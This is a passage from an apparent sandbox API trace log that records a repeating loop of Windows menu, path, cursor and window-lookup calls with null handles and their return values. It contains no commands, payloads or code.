MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.686] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.686] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.686] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.686] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.686] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.686] GetStockObject (i=6) returned 0x1b00018 [0027.686] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.686] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.686] PathFileExistsW (pszPath=0x0) returned 0 [0027.686] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.686] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.686] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.686] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.686] GetMenu (hWnd=0x0) returned 0x0 [0027.686] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x38e) returned -1 [0027.686] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.686] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.686] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.686] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.686] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.686] GetStockObject (i=6) returned 0x1b00018 [0027.686] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.686] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.687] PathFileExistsW (pszPath=0x0) returned 0 [0027.687] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.687] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.687] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.687] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.687] GetMenu (hWnd=0x0) returned 0x0 [0027.687] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.687] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.687] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.687] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.687] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.687] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.687] GetStockObject (i=6) returned 0x1b00018 [0027.687] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.687] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.687] PathFileExistsW (pszPath=0x0) returned 0 [0027.687] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.687] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.687] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.687] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.687] GetMenu (hWnd=0x0) returned 0x0 [0027.687] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.687] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.687] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.687] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.687] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.687] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.687] GetStockObject (i=6) returned 0x1b00018 [0027.687] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.687] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.687] PathFileExistsW (pszPath=0x0) returned 0 [0027.687] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.687] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.688] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.688] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.688] GetMenu (hWnd=0x0) returned 0x0 [0027.688] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.688] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.688] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.688] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.688] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.688] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.688] GetStockObject (i=6) returned 0x1b00018 [0027.688] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.688] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.688] PathFileExistsW (pszPath=0x0) returned 0 [0027.688] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.688] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.688] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.688] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.688] GetMenu (hWnd=0x0) returned 0x0 [0027.688] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.688] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.688] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.688] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.688] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.688] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.688] GetStockObject (i=6) returned 0x1b00018 [0027.688] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.688] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.688] PathFileExistsW (pszPath=0x0) returned 0 [0027.688] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.688] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.688] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.688] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.688] GetMenu (hWnd=0x0) returned 0x0 [0027.689] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x247) returned -1 [0027.689] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.689] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.689] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.689] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.689] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.689] GetStockObject (i=6) returned 0x1b00018 [0027.689] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.689] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.689] PathFileExistsW (pszPath=0x0) returned 0 [0027.689] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.689] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.689] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.689] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.689] GetMenu (hWnd=0x0) returned 0x0 [0027.689] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.689] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.689] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.689] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.689] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.689] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.689] GetStockObject (i=6) returned 0x1b00018 [0027.689] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.689] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.689] PathFileExistsW (pszPath=0x0) returned 0 [0027.689] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.689] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.689] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.689] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.689] GetMenu (hWnd=0x0) returned 0x0 [0027.689] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.689] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.690] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.690] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.690] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.690] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.690] GetStockObject (i=6) returned 0x1b00018 [0027.690] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.690] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.690] PathFileExistsW (pszPath=0x0) returned 0 [0027.690] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.690] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.690] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.690] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.690] GetMenu (hWnd=0x0) returned 0x0 [0027.690] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.690] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.690] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.690] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.690] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.690] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.690] GetStockObject (i=6) returned 0x1b00018 [0027.690] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.690] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.690] PathFileExistsW (pszPath=0x0) returned 0 [0027.690] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.690] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.690] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.690] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.690] GetMenu (hWnd=0x0) returned 0x0 [0027.690] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.690] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.690] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.690] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.690] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.690] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.691] GetStockObject (i=6) returned 0x1b00018 [0027.691] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.691] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.691] PathFileExistsW (pszPath=0x0) returned 0 [0027.691] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.691] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.691] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.691] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.691] GetMenu (hWnd=0x0) returned 0x0 [0027.691] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x363) returned -1 [0027.691] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.691] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.691] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.691] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.691] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.691] GetStockObject (i=6) returned 0x1b00018 [0027.691] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.691] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.691] PathFileExistsW (pszPath=0x0) returned 0 [0027.691] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.691] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.691] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.691] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.691] GetMenu (hWnd=0x0) returned 0x0 [0027.691] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.691] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.691] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.691] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.691] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.691] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.691] GetStockObject (i=6) returned 0x1b00018 [0027.691] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.691] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.691] PathFileExistsW (pszPath=0x0) returned 0 [0027.692] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.692] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.692] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.692] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.692] GetMenu (hWnd=0x0) returned 0x0 [0027.692] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.692] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.692] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.692] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.692] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.692] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.692] GetStockObject (i=6) returned 0x1b00018 [0027.692] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.692] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.692] PathFileExistsW (pszPath=0x0) returned 0 [0027.692] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.692] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.692] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.692] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.692] GetMenu (hWnd=0x0) returned 0x0 [0027.692] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.692] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.692] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.692] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.692] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.692] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.692] GetStockObject (i=6) returned 0x1b00018 [0027.692] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.692] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.692] PathFileExistsW (pszPath=0x0) returned 0 [0027.692] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.692] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.692] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.693] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.693] GetMenu (hWnd=0x0) returned 0x0 [0027.693] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.693] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.693] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.693] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.693] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.693] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.693] GetStockObject (i=6) returned 0x1b00018 [0027.693] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.693] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.693] PathFileExistsW (pszPath=0x0) returned 0 [0027.693] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.693] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.693] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.693] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.693] GetMenu (hWnd=0x0) returned 0x0 [0027.693] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xa9) returned -1 [0027.693] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.693] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.693] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.693] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.693] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.693] GetStockObject (i=6) returned 0x1b00018 [0027.693] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.693] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.693] PathFileExistsW (pszPath=0x0) returned 0 [0027.693] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.693] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.693] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.693] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.693] GetMenu (hWnd=0x0) returned 0x0 [0027.693] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.694] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.694] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.694] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.694] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.694] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.694] GetStockObject (i=6) returned 0x1b00018 [0027.694] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.694] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.694] PathFileExistsW (pszPath=0x0) returned 0 [0027.694] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.694] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.694] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.694] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.694] GetMenu (hWnd=0x0) returned 0x0 [0027.694] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.694] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.694] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.694] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.694] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.694] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.694] GetStockObject (i=6) returned 0x1b00018 [0027.694] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.694] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.694] PathFileExistsW (pszPath=0x0) returned 0 [0027.694] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.694] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.694] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.694] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.694] GetMenu (hWnd=0x0) returned 0x0 [0027.694] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.694] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.694] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.694] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.694] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.695] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.695] GetStockObject (i=6) returned 0x1b00018 [0027.695] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.695] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.695] PathFileExistsW (pszPath=0x0) returned 0 [0027.695] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.695] GetCursorPos (in: lpPoint=0x18f5e4 | out: 